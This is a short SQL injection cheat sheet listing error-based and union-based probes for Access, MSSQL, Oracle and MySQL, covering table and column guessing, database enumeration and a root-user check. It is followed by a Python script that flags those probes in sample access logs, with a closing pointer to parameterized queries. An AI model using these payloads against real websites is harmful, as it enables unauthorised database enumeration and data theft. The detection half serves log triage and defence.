Error-based injection
ACCESS
Guess table names:
- and exists (select * from admin)
- and 0<>(select count(*) from admin)
MSSQL
Guess table names:
- having 1=1
- and (select top 1 name from sysobjects where xtype='u')>0
Oracle
Guess table names:
- and 1=2 union select 1,table_name,3 from user_tables
MySQL
Guess table names:
- union select 1,table_name,3 from information_schema.tables where table_schema='test'
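Determine privileges:
- and ord(mid(user(),1,1))=114 # tests whether the first character of the current user is 'r' (ASCII 114), i.e. root; change the ASCII value to test for other users
Determine the number of columns: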
- order by 1,2……
Enumerate databases:
- union select 1,2,schema_name from information_schema.schemata
- union select 1,2,database()
Enumerate column names:
- union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' # group_concat joins the returned strings into one value
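
Seen from the defender's side, the probes listed above leave recognizable traces in web server access logs. The following is an added example, not part of the original cheat sheet, that flags them in constructed log lines; the rule names, the `normalize` and `scan` helpers and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes on this page; rule names are hypothetical.
RULES = [(n, re.compile(p, re.I)) for n, p in [
    ("mssql_sysobjects", r"\bfrom\s+sysobjects\b"),
    ("oracle_user_tables", r"\bfrom\s+user_tables\b"),
    ("mysql_information_schema", r"\binformation_schema\.(tables|schemata|columns)\b"),
    ("union_select", r"\bunion\s+(all\s+)?select\b"),
    ("having_tautology", r"\bhaving\s+1\s*=\s*1\b"),
    ("exists_subquery", r"\band\s+exists\s*\(\s*select\b"),
    ("order_by_probe", r"\border\s+by\s+\d+"),
    ("user_char_compare", r"\bord\s*\(\s*mid\s*\(\s*user\s*\("),
]]
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(query_string):
    """Undo URL encoding (bounded, to catch double encoding) and comment padding."""
    cur = query_string
    for _ in range(3):
        prev, cur = cur, unquote_plus(cur)
        if cur == prev:
            break
    cur = re.sub(r"/\*.*?\*/", " ", cur, flags=re.S)  # inline comments become spaces
    return re.sub(r"\s+", " ", cur)

def scan(lines):
    """Return (client_ip, [rule names]) for each request whose query string matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        text = normalize(target.partition("?")[2])
        matched = [name for name, rx in RULES if rx.search(text)]
        if matched:
            hits.append((ip, matched))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=5 HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /list.php?sort=name&order=asc HTTP/1.1" 200 700',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.php?id=5%20order%20by%203 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=5+union+select+1,table_name,3+from+information_schema.tables HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?id=5%2520having%25201%253D1 HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, rules)
```

Signature matching of this kind is a triage aid for logs and WAF tuning; the fix for the underlying flaw is parameterized queries.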